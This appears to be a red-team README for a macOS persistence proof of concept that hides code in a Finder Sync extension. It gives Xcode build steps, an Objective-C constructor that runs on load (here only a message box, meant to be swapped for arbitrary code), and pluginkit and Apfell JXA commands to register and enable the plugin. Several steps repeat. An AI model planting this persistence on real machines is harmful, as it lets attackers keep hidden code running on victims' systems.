Finder Plugin Persistence. Attached is a PoC with a simple message box execution
https://objective-see.com/blog/blog_0x11.html
- Open the
InSync.xcodeprojfile in XCode - Change the code on line 17 of the methods file
FinderSync.mwith own Objective C code - In XCode Project-> Build
- Place the app on target
- Register Finder Extenstion Plugin
- Manually below of use the jxa script (FinderSyncPlugins.js)
- pluginkit -a /some/path/persist.appex
- pluginkit -a InSync.app/Contents/PlugIns/FinderSync.appex
- pluginkit -e use -i <finder sync's bundle id>
- pluginkit -e use -i com.apple.InSync.FinderSync
- pluginkit -a /some/path/persist.appex
- Jxa script (FinderSyncPlugins.js) in Apfell
- jsimport {/path/to/FinderSyncPlugins.js}
- jsimport_call FinderSyncPlugins('/path/to/InSync.app')
- Xcode →New Project→Application
- Change the Bundle Name
- Select main project and select add target (+) on bottom
- Add the Finder Sync Extension
- Add the Project Name (take note of the Bundle Identifier)
- Go to FinderSync folder and select the method file (.m)
- Add the following on line 17
- Added the following for a PoC of loading the plugin (stolen from xorrior) or replace with own Objective-C code
//automatically invoked when bundle is loaded
__attribute__((constructor)) static void byebyebye()
{
// Just a message box payload
NSAlert *alert = [[NSAlert alloc] init];
[alert setMessageText:@"Install complete"];
[alert addButtonWithTitle:@"OK"];
[alert setAlertStyle:NSAlertStyleInformational];
[alert runModal];
}
- Product → Build
- Register the plugin Manually below of use the jxa script (FinderSyncPlugins.js)
- pluginkit -a /some/path/persist.appex
- pluginkit -a InSync.app/Contents/PlugIns/FinderSync.appex
- pluginkit -e use -i <finder sync's bundle id>
- pluginkit -e use -i com.apple.InSync.FinderSync
- pluginkit -a /some/path/persist.appex